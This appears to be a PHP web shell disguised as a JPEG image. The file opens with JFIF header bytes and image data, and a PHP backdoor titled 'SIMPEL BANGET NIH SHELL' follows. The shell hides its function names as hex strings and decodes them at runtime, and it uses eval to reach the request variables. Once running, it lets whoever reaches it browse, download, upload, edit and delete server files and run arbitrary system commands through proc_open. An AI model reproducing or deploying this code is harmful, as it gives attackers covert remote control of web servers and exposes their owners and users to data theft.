JFIF  ` ` ;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85 C   !"$"$ C hh"       } !1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz      w !1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz   ? .(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((+QI3L( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( @y -#yIޚXP2$袊 ( ( ( ( ( ( ( ( ( ( ( ( ( ( 3FE a(dN^M4GӁMoO$dssYz4]4+HM9վ2#OL@ܟH O@}LYW=p3! 7'Z&;" zםg|Ij~DǶr^2sI🆒TS(2?y}xmux#sھ[Cqg0mr\ ҏĺҋ{d^Rrr#mOŬ]\>uKcq*?ɯL񆥥Ƕ[ĆlO b[2+'c9Yl{I`:R fڽ;g8jc}ZC)ʑX匌J@:(P Hzh@#֌6Y$ʹ -ڛhJۆqi7s^{|c)]zyۿP+𗈬MaH_?LfG/U ( ( ( ( ( ( ( ("iX1?.ቨ.a?6I"|O+<.2H]aizhV3G8v|t".RcR7t+d(E~0 zD$r2ۜ~oC+Qsvx~%8 ~_|@Nկ81\gNMI#x ÞƠ W Cidlu;$1G5xh\NM#oL Zv6u+fd$HbaKiܻN?ʥt0F۟+g ]Q+r{8"28S4.ofXɑ|֗ x&s_Мp{W.14h~RME;XVX`q֡|:֢oB1fSBP_ WI~Ծ<04%ar UΉ>cy ~1b5w|Iϊ1ٯ4D`A y{-+N SkڲVCXR)M^ѠSc^3! }b}VBَ'9ִ/j~!]/DY_'׿} UQDRBͲ>GLsSnJQ(W Cx`rbF }G:~çivZ1Q =V&,gߥI}kdsѻ4RVEPEPEPEPEPEPH)I1@ (;=7JkO8j_ ٛVr\Q0 "=_Z;-8*ᛯ[ino ZU>#/9]x0]> 3u&%S9/PQVҭtIbxP ==*9 jPX7uMr3<`Z\g:^qV \WKg.잹ȩZ]][Pi۬h=V'O2VK0 TI`z'_֚CH/G Է4V 5, up쇖?夿w5j9]APn<:cs[V57 ]vAl*բp֖Z Pu{ _N]6@ȫaՏ@6sX+W1q@ tX 鴫`I8h3D Gm vCċiҝzRzP!Ҕ`p:P }>5|4VR!-䝒I,O98(=e"|ۦuK *pl?B k@u=$ Mz%%Sr~SsW۴ͧ1;Lg99qw:)Ծ~Ǟ+|7s]Md 9)V5"ھ;/?p MLGN=ҾÈ67c&XL1#}0瞾o};^̠yJ}}ǡǾ%!<zbfEe}I]ֽ NzZ-T0I WiiehRin-lPN׉bgfIìh% $L vˆ*n.Kr{waҷRnGz<+d63G <M4Ҽ' m4H ǪՅ$qpxZZ)gڊ(((((( W|sZ|akmD:rJELr~wkMCX _v4E|!e u.W%1zu?θߎ b%#QB#ApN9^78R ᭭DdA&ӶJ:h9>ct`lҝQ+9 erGn"  0=*(((((&4u+`=cpoōj:-pwp~Q*%*nH/=6a#4׎cÚwyC޾W})ǚEEQ4w_JȨÔjf5>Ϟ[<t(c ~m1K#SI1S@ Z@5F)E0 ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( )8;qzj6:s3yv ӥ b|J ͭj'*"㔃Ty ėc^lb=$7 N4a. R#!{\ts '᳣xj ao% T9ڔ4|QwZ|Z20k G>xO^;]o..tn7h ֆ[\y5/glKv:xu^)-_ۏLwOY5y` 6gҴ/ɬi[X~77O_ x>}NU =?=6;XDa+XSHRlA Q<7ֺ8@ԊzSA7qB Z(AEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEP^WZ#GkM-] eRH-##0'TH( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ^cef6b88lr1ڀ< &[^dB>ץYYh#0JpP c4  QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE QE ????JFIF??x?x?????C?      ???C  ?????"?????????????? ???????}?!1AQa"q2???#B??R??$3br? %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz???????????????????????????????????????????????????????????????????????????????? ??????w?!1AQaq"2?B???? #3R?br? $4?%?&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz???????????????????????????????????????????????????????????????????????? ????????N????m?????j????EP?? * * GOOD LUCK, HAVE FUN! */ session_start(); error_reporting(E_ALL); header("X-XSS-Protection: 0"); ob_start(); set_time_limit(0); error_reporting(0); ini_set('display_errors', FALSE); $Array = [ '6d6b', '646972', '6765745f66696c655f7065726d697373696f6e73', '69735f7772697461626c655f7065726d697373696f6e', '65786563757465436f6d6d616e64', '70726f635f6f70656e', '73747265616d5f6765745f636f6e74656e7473', '66696c655f6765745f636f6e74656e7473', '66696c655f7075745f636f6e74656e7473', '62696e32686578', '6d6f76655f75706c6f616465645f66696c65', '68746d6c7370656369616c6368617273', '6865783262696e', '7068705f756e616d65', '7363616e646972', '69735f646972', '66696c655f657869737473', '7265616466696c65', '66696c6573697a65', '69735f7772697461626c65', '72656e616d65', '66696c657065726d73', '737072696e7466', '737562737472', '66636c6f7365', '70726f635f6f70656e', '69735f7265736f75726365', '70726f635f636c6f7365', '756e6c696e6b', '69735f66696c65', '4554', //30 '564552', '53494f4e', '4c4553', '5354', ]; $SETSUNA = []; foreach ($Array as $hexString) { $SETSUNA[] = hex2bin($hexString); } $satu = '_G'; $dua = $SETSUNA[30]; $tiga = '_SER'; $empat = $SETSUNA[31]; $lima = '_SES'; $enam = $SETSUNA[32]; $tujuh = '_FI'; $delapan = $SETSUNA[33]; $sembilan = '_PO'; $sepuluh = $SETSUNA[34]; // Gunakan $SETSUNA sesuai kebutuhan $a = $SETSUNA[0]; $b = $SETSUNA[1]; $c = $a . $b; $L = eval('return $' . $satu . $dua . ';'); $M = eval('return $' . $tiga . $empat . ';'); $N = eval('return $' . $lima . $enam . ';'); $e = eval('return $' . $tujuh . $delapan . ';'); $o = eval('return $' . $sembilan . $sepuluh . ';'); $f = $SETSUNA[2]; $g = $SETSUNA[3]; $h = $SETSUNA[4]; $i = $SETSUNA[5]; $j = $SETSUNA[6]; $q = $SETSUNA[7]; $s = $SETSUNA[8]; $v = $SETSUNA[9]; $w = $SETSUNA[10]; $y = $SETSUNA[11]; $z = $SETSUNA[12]; $NM = $SETSUNA[13]; $SCN = $SETSUNA[14]; $ID = $SETSUNA[15]; $FE = $SETSUNA[16]; $RF = $SETSUNA[17]; $FS = $SETSUNA[18]; $IW = $SETSUNA[19]; $RNM = $SETSUNA[20]; $FP = $SETSUNA[21]; $SPRF = $SETSUNA[22]; $SBSR = $SETSUNA[23]; $FCL = $SETSUNA[24]; $PROP = $SETSUNA[25]; $IR = $SETSUNA[26]; $PRCL = $SETSUNA[27]; $UNL = $SETSUNA[28]; $ISF = $SETSUNA[29]; $dir = isset($L['dir']) ? $z($L['dir']) : '.'; $files = $SCN($dir); $upload_message = ''; $edit_message = ''; $delete_message = ''; $create_dir_message = ''; // Function to create a new directory function createDirectory($dir, $newDirectoryName) { $newDirPath = $dir . '/' . $newDirectoryName; global $ID; if (!$ID($newDirPath)) { global $c; if ($c($newDirPath, 0755, true)) { return "Directory '$newDirectoryName' created successfully."; } else { return "Failed to create directory. Check directory permissions or other errors."; } } else { return "Directory '$newDirectoryName' already available."; } } // Function to Download if (isset($L['download'])) { $fileToDownload = $z($L['download']); global $FS; // Make sure that the requested file exists if ($FE($fileToDownload)) { // Set header to trigger download header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($fileToDownload) . '"'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . $FS($fileToDownload)); $RF($fileToDownload); exit; } else { // Handle jika file tidak ditemukan echo "File not found."; } } // Function to get file permissions function f($file): string { global $FP, $SPRF, $SBSR; return $SBSR($SPRF('%o', $FP($file)), -4); } // Function to check write permissions function g($file): bool { global $IW; return $IW($file); } // Function to execute a command function h($command, $workingDirectory = null) { global $j, $FCL, $PROP, $IR, $PRCL; $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = $PROP($command, $descriptorspec, $pipes, $workingDirectory); if ($IR($process)) { // Read output from stdout and stderr $output_stdout = $j($pipes[1]); // Ganti dengan $SETSUNA[6] jika diperlukan $output_stderr = $j($pipes[2]); // Ganti dengan $SETSUNA[6] jika diperlukan $FCL($pipes[0]); $FCL($pipes[1]); $FCL($pipes[2]); $return_value = $PRCL($process); return "Output (stdout):\n" . $output_stdout . "\nOutput (stderr):\n" . $output_stderr; } else { return "Failed to execute command."; } } if (isset($L['636d64'])) { $command = $z($L['636d64']); $result = h($command, $dir); } if (isset($e['file_upload'])) { $tempFile = $e['file_upload']['tmp_name']; $targetFile = $dir . '/' . $e['file_upload']['name']; if ($w($tempFile, $targetFile)) { $upload_message = 'File uploaded successfully.'; } else { $upload_message = 'Failed to upload file.'; } } //function for edit file if (isset($o['edit_file'])) { $file = $o['edit_file']; $content = $q($file); if ($content !== false) { ?> Edit File

Edit File

' . z($message) . '

'; } $un = $NM(); $current_dir = realpath($dir); ?> SIMPEL BANGET NIH SHELL

SIMPEL BANGET NIH SHELL

Current directory:

Server information:



Filename Permissions Actions

Command Execution Bypass





Command Result: